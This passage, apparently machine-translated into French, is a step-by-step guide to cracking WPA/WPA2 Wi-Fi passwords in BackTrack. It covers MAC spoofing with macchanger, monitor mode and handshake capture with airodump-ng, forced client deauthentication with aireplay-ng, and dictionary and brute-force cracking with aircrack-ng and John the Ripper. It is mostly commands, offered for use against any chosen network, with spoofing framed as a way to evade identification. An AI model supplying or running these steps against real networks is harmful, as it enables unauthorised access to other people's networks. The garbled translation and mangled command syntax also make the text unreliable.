Étape 3: Hack WPA/WPA2
-Bootez dans BackTrack
-Ouvrez Konsole, qui est un utilitaire de ligne de commande intégré dans BackTrack. C’est la boîte noire dans le coin en bas à gauche (voir Image).
Nous avons maintenant entreront dans les commandes suivantes dans la ligne de commande notée par "BOLD" ainsi que des explications quant à ce qu’ils font :
-Les commandes suivantes arrêtent l’interface sans fil donc vous pouvez changer votre adresse mac, c’est important parce que votre adresse mac est un identifiant unique pour un trucage est une bonne idée si vous accédez à un réseau, à que vous n’êtes pas autorisé. (qui soit dit en passant, je condamne totalement)
1 :
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger--mac 00:11:22:33:44:55 wlan0
AIRMoN-ng start wlan0
2 :
-Maintenant, nous allons mettre l’outil airodump-ng en mode moniteur, cela nous permettra de voir tous les réseaux sans fil autour de nous (voir la première photo).
airodump-ng mon0
Maintenant, choisissez le réseau que vous voulez pirater et prendre note du BSSID et le canal, c’est un ainsi que de l’ESSID. La PWR doit être assez élevé pour être en mesure de le pirater, cette valeur est déterminée par la proximité, vous êtes au routeur sans fil. Plus vous êtes proche, le mieux.
Une fois que vous avez choisi le réseau sans fil entrez les informations suivantes dans le terminal :
Ceci écrira capture les paquets et les mettre dans le fichier « NomFichier », nous essayons de saisir la poignée de main entre le routeur et une connexion Wi-Fi qui nous donnera la clé, que nous avons besoin de crack.
3 :
airodump-ng mon0--canal *--bssid **: **: **: **: **: ** filename -w
L’étape suivante est facultative, mais est fortement recommandé car il permettra d’accélérer le processus de beaucoup de choses.
Une fois "handshake WPA: **: **: **: **: **: **" s’affiche dans le coin supérieur droit, nous pouvons passer. Si vous rencontrez des difficultés à obtenir le handshake WPA se produise alors l’étape 4.
4 :
aireplay-ng-1 0 - un **: **: **: **: **: ** - c **: **: **: **: **: ** mon0
Que fait cette étape (4), c’est qu'elle deauthorizes une connexion Wi-Fi et les trie à rétablir donc il va générer une nouvelle poignée de main pour capturer. Cette étape se termine une fois que vous avez saisi la poignée de main.
5 :
aircrack-ng – w wordlist.lst -b **: **: **: **: **: ** filename.cap
Étape 5 tente de casser le mot de passe dans « filename.cap » à l’aide d’une liste de mots, ici appelé « wordlist.lst » vous pouvez télécharger un bon dictionnaire de mot 200 millions ici (128Mo mais décompressé est 800 MB).
Votre ordinateur doit calculer la valeur de hachage de chaque mot de passe dans cette liste, mais un ordinateur peut passer par ces mots de passe 200 millions en 6 à 12 heures.
6.
Si le mot de passe n’est pas trouvé dans le dictionnaire vous pouvez essayer et la force brute du mot de passe avec cette commande: (noter que cela peut prendre beaucoup de temps selon leur force de mot de passe).
/pentest/password/jtr/john--stdout--incrémentielle : tous | aircrack-ng - b **: **: **: **: **: ** -w - filename.cap